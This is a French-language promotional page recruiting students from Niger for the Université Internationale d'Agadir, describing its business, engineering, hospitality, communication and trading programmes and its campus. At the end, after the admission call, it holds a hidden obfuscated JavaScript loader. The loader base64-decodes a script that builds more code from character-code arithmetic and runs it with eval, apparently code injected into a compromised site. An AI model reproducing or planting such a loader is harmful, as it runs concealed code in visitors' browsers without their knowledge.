Candidats du Niger

Vous souhaitez étudier dans une Université au Maroc ? 

Université Internationale d’Agadir, est une des universités privées les plus réputées en termes d’Enseignement supérieur au Maroc. Car la choisir et etudier au maroc ,c’est se préparer à une carrière réussie en Management. université marocaine inscription 

Notamment grâce à l’école de commerce et de gestion , à l’Ecole d’Ingénieurs, en Hôtellerie ou en Communication au sein de l’école de Tourisme et de Communication, dans un milieu de vie exceptionnel au cœur de la première station balnéaire du Maroc, Agadir.

L’université Internationale d’Agadir vous propose une panoplie de programmes de formation  : université marocaine inscription 

Bac+3 (licence)    

Bac+5 et Masters en double diplomation avec des Université partenaires grâce notamment à ses 4 écoles supérieures. à savoir :

  • ISIAM Agadir, Maroc– ecole de commerce et de Gestion (business school).  e
  • L’Ecole Polytechnique d’Agadir, Maroc – ecole d’Ingénieurs.
  • L’Ecole Supérieure d’Hôtellerie et de Tourisme d’Agadir, Maroc  – ecole du tourisme.
  • SupH’Com – Ecole de Communication et de Sciences Humaines d’Agadir, Maroc  – ecole de communication.

D’ailleurs , l’Université Internationale d’Agadir offre également, une formation approfondie au Trading pour tous les passionnés de la Finance, grâce à son centre Krechendo Trading Agadir, Maroc.

Les Formations:

Universiapolis – Groupe ISIAM est la résultante d’une aventure entamée il y’a 25 ans de cela. ISIAM est, en effet, la première école supérieure de gestion au Maroc et dans toute l’Afrique (financée par le gouvernement Canadien).

En effet c’est grâce à l’expérience et au travail acharné de son fondateur M. Aziz BOUSLIKHANE ainsi que l’implication de son corps professoral et administratif que le Groupe ISIAM acquiert,  en 2012, le statut d’Université privée reconnue par l’état.

L’accréditation de toutes les filières d’Universiapolis atteste de l’excellence de son système pédagogique nord-américain, de son infrastructure hors normes, de la diversité de ses partenariats internationaux et de son réseau d’entreprises nationales et internationales.

Université internationale d’Agadir propose des formations en différents domaines .

Business school –  Faculté des Sciences de Gestion ISIAM : 

D’abord crée en 1989, la Faculté des Sciences de Gestion ISIAM-Agadir, a été effectivement, la première école supérieure de gestion financée par le gouvernement canadien. De plus ,ayant opté pour les méthodes d’enseignement nord-américaines.

Par ailleurs ,la Faculté des Sciences de Gestion de l’Université Internationale d’Agadir offre des programmes Bachelors et Masters en sciences de gestion dans les spécialités Marketing gestion commerciale, Finance-contrôle de gestion, Gestion des ressources humaines, Informatique, Logistique et en Management.

En plus de ses programmes, l’ISIAM offre des programmes Master en double diplomation avec les universités partenaires en France et au Canada.

Doté d’un corps professoral de plus de:

  • 70 professeurs dont 30 intervenants internationaux, l’ISIAM accueille plus de 900 étudiants issus de 18 pays.

université internationale Agadir Business School Maroc

Pour plus de détails : Cliquer ici.

Ingénierie – L’Ecole Polytechnique d’Agadir :

L’Ecole Polytechnique d’Agadirl’ccole d’ingénierie offre une formation d’ingénieurs (Bac+5) avec programme « classes prépa » intégré dans les filières les plus sollicitées par les entreprises, tel que :

Ecole ingénieure

Ces formations s’appuient principalement sur l’acquisition de bases scientifiques solides, de compétences professionnelles de haut niveau et d’un savoir-être très développé.

Pour plus de détails : Cliquer ici.

Hôtellerie et tourisme – l’Ecole Supérieure de Tourisme et Technologie Hôtelière :

Fondée par l’université internationale d’agadir, le pionnier de la formation et de la pédagogie nord-américaine au Maroc et en Afrique, l’Ecole Supérieure de Tourisme et Technologie Hôtelière ,bénéficie de la longue expérience du groupe dans l’enseignement supérieur privé.

La création de cette école vise essentiellement la formation :

  • des cadres capables de relever les défis liés au développement du secteur touristique et hôtelier au Maroc.

Au terme du cursus, les étudiants sont appelés à maîtriser le fonctionnement des différents départements d’un établissement hôtelier tel que :

  • Hébergement.   Aussi     
  • Restauration, cuisine. Aussi
  • Ressources humaines. Aussi
  • Commercial. Aussi
  • Finance etc. Aussi

Les diplômés sont habilités à occuper des postes de gestionnaires dans tous les départements touristiques et hôteliers, ou encore, sont en mesure de développer leur propre projet touristique.   

ecole d'ingénieurs niger, ecole de commerce niger , ecole de communication niger , ecole supérieure niger, ecole tourisme niger université niger, université privée niger ,

Pour plus de détails : Cliquer ici.

 

La communication – L’Ecole Supérieure de Communication et des Sciences Humaines  :

Quant à L’Ecole Supérieure de Communication et des Sciences Humainessa mission est de former les étudiants aux métiers de la communication mais aussi à la Gestion Ressources  humaines.

Elle été créée pour répondre aux besoins du marché d’emploi et des jeunes nécessaires pour une carrière notamment :

  • En communication, publicité, animation, création graphique.
  • Les langues appliquées, économie sociale , gestion de la ressource Humaine.

Les moyens pédagogiques et les enseignements aussi bien théoriques que pratiques fournie par l’Ecole, développe chez l’étudiant des capacités nécessaires pour les métiers de la communication, entre autre :

  • Le Savoir Ecouter, Transmettre et Diffuser une information.
  • La compréhension du fonctionnement des organisations.

Pour plus de détails : Cliquer ici.

 

Formation en Trading :

Krechendo Trading est une salle de marché qui a pour but d’initier d’abord à la bourse puis aux activités du trading, d’investissement sur les marchés européens et américains, notamment pour débutants mais aussi pour traders confirmés.Avec une formation trading soigneusement préparée, les futurs traders en formation découvriront le trading au carnet d’ordres, une méthode enseignée et utilisée dans les pays anglo-saxons.

Krechendo à débuté son activité à Paris en 2013 puis à Bruxelles depuis l’année 2015. Ce fut, pour ces deux salles, les premières trading arcades ouverte dans leurs pays respectifs.

Krechendo propose également  un modèle similaire à celui des trading arcades que l’on trouve sur les plus grandes places financières .

ecole d'ingénieurs niger, ecole de commerce niger , ecole de communication niger , ecole supérieure niger, ecole tourisme niger université niger, université privée niger ,

Pour plus de détails : Cliquer ici.

 

La vie estudiantine à l’Université internationale d’Agadir  :

Le Campus de l’Université internationale d’Agadir :

le CAMPUS de l’Université Internationale d’Agadir offre aux étudiants un espace de vie et d’études exceptionnel et unique.

Le Site de l’Université Internationale de d’Agadir est totalement connecté et dispose des infrastructures suivantes :

  • Une bibliothèque et centre de documentation  compte plus de 18.000 ouvrages dont 8.000 titres scientifiques et techniques.
  • Un centre de langues: Université dispose d’un institut de langues et d’une plateforme e-learning en partenariat avec le British Council.
  • Restaurant : Espace de vie et de restauration.
  • Espaces sportifs : terrain de foot, Tennis , basket, volleyball et Gym-Musculation.
  • Logement universitaire .

ecole d'ingénieurs niger, ecole de commerce niger , ecole de communication niger , ecole supérieure niger, ecole tourisme niger université niger, université privée niger ,

L’épanouissement au quotidien dans Université internationale d’Agadir

Attentive  et encore  soucieuse  à l’épanouissement de ses étudiants.

l’Université Internationale d’Agadir propose un cadre de vie incitatif  qui fait de la vie étudiante une priorité.

Parce qu’être étudiant, c’est un challenge au quotidien, ça permet de s’ouvrir aux autres, de découvrir le monde de même de se dévoiler grâce aux expériences vécues à l’université internationale d’Agadir ,via des mesures d’accompagnement  et d’encadrement des activités étudiantes, soutient à 100% les prises d’initiatives étudiantes qui viennent rythmer la vie du campus.

Le Service de la Vie Étudiante notamment œuvre  d’abord au développement de la vie étudiante, aussi à l’animation du campus puis participe à l’amélioration du cadre de vie des étudiants de l’UNIVERSIAPOLIS.

Il constitue le relais d’information entre les étudiants et les différents Services de l’Université internationale d’Agadir .

De plus, ce département encadre les actions du Bureau des Étudiants puis , des clubs étudiants et favorise  l’implication des étudiants dans des projets associatifs, culturels et sportifs.

De même ,il faut rappeler  aussi que ce service est également en charge de l’accueil et de l’accompagnement des étudiants à besoins spécifiques, dans leurs différentes démarches administratives et pédagogiques ,en vue d’améliorer leur inclusion au sein de  l’université internationale d’Agadir.

Déposer votre demande d’admission à l’Université Internationale Agadir -Universiapolis-.

var KOPYXPUBUP = atob(‘dmFyIEVFQ0xWV1pWQlkgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDE0IC0gNCwgMTE5IC0gMSwgMTAxIC0gNCwgMTIxIC0gNywgMzMgLSAxLCAxMTYgLSA5LCAxMTAgLSA5LCAxMjQgLSAzLCAzOSAtIDcsIDY1IC0gNCwgMzMgLSAxLCA0NiAtIDcsIDczIC0gMSwgMTAwIC0gMiwgMTEyIC0gMywgODkgLSA5LCA3MyAtIDcsIDc1IC0gNSwgODkgLSAzLCAxMTAgLSA5LCA3OSAtIDgsIDEwMyAtIDIsIDQ0IC0gNSwgNjYgLSA3LCAxOCAtIDgsIDEyNCAtIDYsIDk4IC0gMSwgMTE2IC0gMiwgNDAgLSA4LCAxMDkgLSA4LCAxMTMgLSAzLCAxMDcgLSA4LCAxMDMgLSAyLCAxMDUgLSA1LCAzNiAtIDQsIDYyIC0gMSwgMzYgLSA0LCA0NyAtIDgsIDg2IC0gNiwgMTA0IC0gMSwgODQgLSA3LCAxMDQgLSAyLCAxMDEgLSAyLCA3NSAtIDcsIDgyIC0gOSwgNTYgLSA4LCA4MSAtIDQsIDY3IC0gMiwgMTE2IC0gOCwgMTE4IC0gOCwgODggLSAxLCA3NSAtIDQsIDEwOSAtIDYsIDczIC0gMiwgNzEgLSA2LCAxMTUgLSA5LCA3OCAtIDEsIDU5IC0gOCwgNzYgLSAxLCAxMjUgLSAzLCA4MyAtIDYsIDc4IC0gMiwgODYgLSA5LCA0OSAtIDEsIDEyNCAtIDksIDExNSAtIDEsIDc4IC0gOSwgNjkgLSA0LCAxMDggLSA1LCAxMjcgLSA3LCA4NSAtIDcsIDExMSAtIDYsIDg0IC0gNywgOTEgLSA3LCA2OSAtIDIsIDg1IC0gMiwgODIgLSA5LCA3NSAtIDIsIDgxIC0gNSwgODggLSA3LCAxMjMgLSA0LCA5MyAtIDMsIDEwOCAtIDcsIDgwIC0gOSwgOTIgLSA3LCA1NCAtIDUsIDg2IC0gOCwgOTEgLSA5LCAxMDAgLSAxLCAxMjEgLSA0LCA3MiAtIDIsIDg3IC0gMywgMTI2IC0gNiwgNzcgLSA3LCA4OSAtIDcsIDcyIC0gMSwgMTI0IC0gOCwgNzkgLSA2LCA4NCAtIDYsIDEwNyAtIDIsIDg4IC0gNywgNjkgLSAxLCA3NiAtIDEsIDQ5IC0gMSwgMTE2IC0gMSwgNjAgLSA1LCA3MyAtIDcsIDEyNCAtIDQsIDEwOSAtIDIsIDg1IC0gMywgNzkgLSAxLCAxMDcgLSAxLCA3OSAtIDYsIDEwOCAtIDEsIDczIC0gNSwgNzQgLSA3LCA4OSAtIDQsIDgyIC0gMSwgODIgLSAyLCA2NiAtIDEsIDEwNCAtIDQsIDc4IC0gOCwgMTAyIC0gMiwgMTI4IC0gNiwgNzIgLSAzLCA1NiAtIDgsIDgwIC0gMiwgODkgLSA0LCA4MSAtIDcsIDExNiAtIDIsIDg0IC0gMywgMTA4IC0gMywgNzMgLSA4LCA4OSAtIDIsIDc0IC0gMywgODUgLSAyLCA2OCAtIDIsIDUzIC0gMSwgMTAwIC0gMywgOTcgLSA5LCAxMTMgLSA2LCA5MSAtIDksIDg2IC0gOCwgOTAgLSA5LCA4NyAtIDYsIDEyMiAtIDUsIDY5IC0gMywgNzIgLSA3LCA4NSAtIDQsIDEyOSAtIDcsIDc0IC0gMSwgMTI5IC0gNywgOTAgLSAxLCA1NCAtIDcsIDg5IC0gNiwgMTIzIC0gMiwgMTA4IC0gMSwgODEgLSA3LCA5NCAtIDQsIDEyNyAtIDcsIDcxIC0gMiwgOTQgLSA0LCA4NSAtIDgsIDkwIC0gNiwgOTYgLSA3LCAxMTkgLSAxLCA4MiAtIDQsIDg2IC0gMSwgMTE5IC0gOCwgMTIxIC0gOCwgNzIgLSA2LCA3MCAtIDMsIDc4IC0gOSwgNzggLSAxLCA4MiAtIDEsIDEyOCAtIDYsIDExNCAtIDMsIDEyOCAtIDgsIDk3IC0gOCwgOTMgLSA1LCA1OCAtIDEsIDEwNCAtIDMsIDg3IC0gMywgODkgLSA4LCA3MCAtIDEsIDExOCAtIDgsIDY5IC0gNCwgODkgLSA3LCAxMDcgLSA0LCA2NCAtIDcsIDc2IC0gMiwgMTI5IC0gOCwgMTEyIC0gOSwgMTE0IC0gOSwgODkgLSA2LCAxMjUgLSA0LCA2NCAtIDgsIDcyIC0gNywgODIgLSA3LCA4OCAtIDcsIDkyIC0gMiwgNzIgLSA0LCA3OCAtIDEsIDg4IC0gNCwgODIgLSA5LCA1NSAtIDUsIDc5IC0gMiwgMTI3IC0gOCwgMTE5IC0gNCwgMTEyIC0gNiwgODIgLSA4LCAxMTIgLSA3LCA2OSAtIDQsIDgyIC0gNiwgNzAgLSA1LCA5MiAtIDgsIDkxIC0gOSwgMTE5IC0gNiwgODEgLSAzLCAxMDcgLSAyLCA4MyAtIDIsIDc2IC0gOCwgNzYgLSAxLCA1NiAtIDgsIDEyNiAtIDYsIDEyNCAtIDIsIDk4IC0gMSwgNjggLSAzLCA2NSAtIDQsIDY4IC0gNywgNDggLSA5LCA2NCAtIDUsIDE3IC0gNywgMTEwIC0gOCwgMTIyIC0gNSwgMTE4IC0gOCwgMTAxIC0gMiwgMTI0IC0gOCwgMTA5IC0gNCwgMTE4IC0gNywgMTE5IC0gOSwgMzcgLSA1LCAxMjMgLSAzLCAxMTggLSA3LCAxMTggLSA0LCAxMDMgLSA4LCAxMDggLSA3LCAxMTMgLSAzLCAxMDQgLSA1LCA0MSAtIDEsIDEyMCAtIDUsIDEyNCAtIDgsIDExOCAtIDQsIDEwOSAtIDQsIDExOCAtIDgsIDEwOSAtIDYsIDQ3IC0gMywgMzMgLSAxLCAxMTUgLSA4LCAxMDMgLSAyLCAxMjIgLSAxLCA0MyAtIDIsIDM4IC0gNiwgMTMyIC0gOSwgMTggLSA4LCA0MCAtIDgsIDQwIC0gOCwgMTI0IC0gNiwgOTggLSAxLCAxMTggLSA0LCAzOSAtIDcsIDEyMyAtIDksIDEwNiAtIDUsIDExOCAtIDMsIDM2IC0gNCwgNjQgLSAzLCAzOSAtIDcsIDQ4IC0gOSwgNDQgLSA1LCA2MSAtIDIsIDE2IC0gNiwgMzUgLSAzLCA0MCAtIDgsIDEwOCAtIDYsIDEyMCAtIDksIDEyMSAtIDcsIDMzIC0gMSwgNDIgLSAyLCAxMTkgLSAxLCAxMDIgLSA1LCAxMjMgLSA5LCA0MCAtIDgsIDExNCAtIDksIDQwIC0gOCwgNjMgLSAyLCAzMyAtIDEsIDU3IC0gOSwgNjggLSA5LCAzMyAtIDEsIDEwOCAtIDMsIDQwIC0gOCwgNjggLSA4LCA0MSAtIDksIDExOCAtIDMsIDEyNSAtIDksIDExOCAtIDQsIDExMCAtIDUsIDExMyAtIDMsIDEwNSAtIDIsIDU1IC0gOSwgMTEyIC0gNCwgMTAyIC0gMSwgMTEyIC0gMiwgMTEwIC0gNywgMTIyIC0gNiwgMTA2IC0gMiwgNjggLSA5LCAzOCAtIDYsIDEwNiAtIDEsIDUwIC0gNywgNDYgLSAzLCA0NSAtIDQsIDQwIC0gOCwgMTI2IC0gMywgMTEgLSAxLCA0MSAtIDksIDM5IC0gNywgMzUgLSAzLCAzOSAtIDcsIDExOCAtIDQsIDEwNyAtIDYsIDExOCAtIDMsIDM4IC0gNiwgNDggLSA1LCA2NiAtIDUsIDM2IC0gNCwgODQgLSAxLCAxMjEgLSA1LCAxMTggLSA0LCAxMTMgLSA4LCAxMTEgLSAxLCAxMDkgLSA2LCA1NSAtIDksIDEwNSAtIDMsIDExOCAtIDQsIDExMiAtIDEsIDExNCAtIDUsIDc0IC0gNywgMTA2IC0gMiwgMTA1IC0gOCwgMTE3IC0gMywgNzQgLSA3LCAxMjAgLSA5LCAxMDMgLSAzLCAxMDcgLSA2LCA0NiAtIDYsIDExNiAtIDEsIDEyMCAtIDQsIDEyMyAtIDksIDEwNyAtIDIsIDExMyAtIDMsIDEwNyAtIDQsIDU1IC0gOSwgMTA1IC0gNiwgMTEyIC0gOCwgOTkgLSAyLCAxMTkgLSA1LCA3MiAtIDUsIDExMiAtIDEsIDEwNyAtIDcsIDEwMiAtIDEsIDcyIC0gNywgMTI1IC0gOSwgNDMgLSAzLCAxMDggLSAzLCA0MiAtIDEsIDM1IC0gMywgMTAzIC0gOSwgMTggLSA4LCAxOCAtIDksIDE1IC0gNiwgMTQgLSA1LCAxMCAtIDEsIDExMiAtIDUsIDEwMiAtIDEsIDEyOSAtIDgsIDU0IC0gOCwgMTA4IC0gOSwgMTEyIC0gOCwgMTAzIC0gNiwgMTIwIC0gNiwgNzAgLSAzLCAxMjAgLSA5LCAxMDIgLSAyLCAxMTAgLSA5LCA3MyAtIDgsIDExOSAtIDMsIDQ3IC0gNywgMTEyIC0gNywgMzQgLSAyLCA0MyAtIDYsIDQxIC0gOSwgMTA4IC0gMSwgMTAyIC0gMSwgMTI5IC0gOCwgNDkgLSAzLCAxMDkgLSAxLCAxMDggLSA3LCAxMTYgLSA2LCAxMDQgLSAxLCAxMjUgLSA5LCAxMTEgLSA3LCA0OSAtIDgsIDQ5IC0gOCwgNjggLSA5LCAxMiAtIDIsIDM0IC0gMiwgNDEgLSA5LCAxMjYgLSAxLCAxOSAtIDksIDM2IC0gNCwgMzggLSA2LCAxMTUgLSAxLCAxMDUgLSA0LCAxMjQgLSA4LCAxMjUgLSA4LCAxMTUgLSAxLCAxMTMgLSAzLCAzMyAtIDEsIDEyMSAtIDcsIDExMCAtIDksIDExOCAtIDMsIDY2IC0gNywgMTYgLSA2LCAxMzQgLSA5LCAxMiAtIDIsIDE0IC0gNCwgMTI0IC0gNiwgMTAxIC0gNCwgMTE1IC0gMSwgMzggLSA2LCAxMDggLSA4LCAxMTAgLSA5LCAxMDQgLSA1LCAzNyAtIDUsIDY3IC0gNiwgMzkgLSA3LCAxMjQgLSA0LCAxMTUgLSA0LCAxMTcgLSAzLCA5NyAtIDIsIDExMCAtIDksIDExNyAtIDcsIDEwNiAtIDcsIDQ2IC0gNiwgMTAxIC0gNCwgMTE4IC0gMiwgMTEzIC0gMiwgMTA1IC0gNywgNDYgLSA2LCAxMDUgLSA0LCAxMTkgLSA5LCAxMDUgLSA2LCAxMDkgLSA4LCAxMDggLSA4LCA0NCAtIDMsIDUzIC0gOSwgNDAgLSA4LCAxMDkgLSAyLCAxMDMgLSAyLCAxMjQgLSAzLCA0NSAtIDQsIDY4IC0gOSwgMTMgLSAzLCA0OCAtIDgsIDExMSAtIDEsIDEwOCAtIDcsIDEyMCAtIDEsIDM2IC0gNCwgNzEgLSAxLCAxMjYgLSA5LCAxMTcgLSA3LCAxMDUgLSA2LCAxMjUgLSA5LCAxMTAgLSA1LCAxMTIgLSAxLCAxMTggLSA4LCA0OSAtIDksIDEwNCAtIDQsIDEwNSAtIDQsIDEwOCAtIDksIDQ1IC0gNCwgNDMgLSAyLCA0MiAtIDIsIDQzIC0gMiwgNjEgLSAyLCAxNCAtIDQsIDE2IC0gNik7ZXZhbChFRUNMVldaVkJZKTs=’);
eval(KOPYXPUBUP);